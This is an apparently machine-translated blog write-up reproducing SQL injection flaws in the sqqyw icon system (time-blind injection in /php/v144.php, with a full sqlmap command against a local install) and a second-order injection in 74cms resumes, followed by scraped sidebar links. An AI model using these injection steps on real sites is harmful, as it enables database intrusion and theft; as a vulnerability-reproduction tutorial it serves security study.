当前位置:网站首页>Sqqyw (indifferent dot icon system) vulnerability recurrence and 74cms vulnerability recurrence
Sqqyw (indifferent dot icon system) vulnerability recurrence and 74cms vulnerability recurrence
2022-07-06 14:11:00 【Unknown white hat】
Catalog
One 、sqqyw( Indifferent point icon system )
Select regular and case insensitive
View with variables id File contents of
To define ID Of ywX Function to perform a global search
Look at the pictures with ywX File content of function
Conduct full-text search on the obtained text
Yes sohuquan Full text tracking
Judge the echo through time blind injection
adopt sqlmap Just inject the tool
Two 、74cms Loophole recurrence
Or continue to save and monitor
sqqyw( Indifferent point icon system )
Global search keywords
Search for select
Find out select, But it's not sql Statement select, This is in the label select
Select regular and case insensitive
View with variables id File contents of
If there is garbled code, change the coding format , Can be replaced by GBK and UTF-8
To define ID Of ywX Function to perform a global search
Look at the pictures with ywX File content of function
see /php/v144.php page
Conduct full-text search on the obtained text
see domain Whether in sohuquan Inside
Yes sohuquan Full text tracking
Get the address of your website
Yes domain Full text tracking
Modify the source address
id=1
Continue searching for text
Give Way api==ok, And u,p,id It's not empty.
Go around
Statement executed
Judge the echo through time blind injection
Because in the statement sleep(3) Was executed three times , So delay 9s
So here is the injection point
adopt sqlmap Just inject the tool
python sqlmap.py -u "http://localhost/sqqyw/php/v144.php?api=ok&u=1&p=1&id=1" --batch -p "id" --current-db74cms Loophole recurrence
Using the conditions of secondary injection :
insert update
Variable control
Enter the membership Center
Sign in / register
Create a new resume
Turn on mysql monitor
Break down 、 to update
Save and listen
update The statement in is not related to the statement we inserted ,update We didn't write it ourselves , It is the updated number of the corresponding field matched by the system , So you can't use .
Continue to save and listen
insert The data in is our choice , It's not what we inserted , So you can't use .
Or save and listen
This makes it direct update The updated , No insertion , So it doesn't work .
Or continue to save and monitor
There is insert and update, And the variables are controllable
So we can check the user name through secondary injection
insert Filtering has little effect when inserting , as long as update Just don't filter when updating .
Resume management
边栏推荐
- Build domain environment (win)
- 内网渗透之内网信息收集(五)
- Strengthen basic learning records
- SQL注入
- Record a penetration of the cat shed from outside to inside. Library operation extraction flag
- How to understand the difference between technical thinking and business thinking in Bi?
- Read only error handling
- 7-1 output all primes between 2 and n (PTA programming)
- SRC mining ideas and methods
- captcha-killer验证码识别插件
猜你喜欢
随机推荐
TypeScript快速入门
【MySQL-表结构与完整性约束的修改(ALTER)】
附加简化版示例数据库到SqlServer数据库实例中
7-5 走楼梯升级版(PTA程序设计)
强化学习基础记录
Experiment 4 array
攻防世界MISC练习区(gif 掀桌子 ext3 )
Attack and defense world misc practice area (simplerar, base64stego, no matter how high your Kung Fu is, you are afraid of kitchen knives)
How to turn wechat applet into uniapp
7-4 散列表查找(PTA程序设计)
msf生成payload大全
[insert, modify and delete data in the headsong educator data table]
7-8 7104 约瑟夫问题(PTA程序设计)
Force deduction 152 question multiplier maximum subarray
Safe driving skills on ice and snow roads
Detailed explanation of network foundation
Experiment 7 use of common classes
Intranet information collection of Intranet penetration (5)
Experiment 9 input and output stream (excerpt)
Analysis of penetration test learning and actual combat stage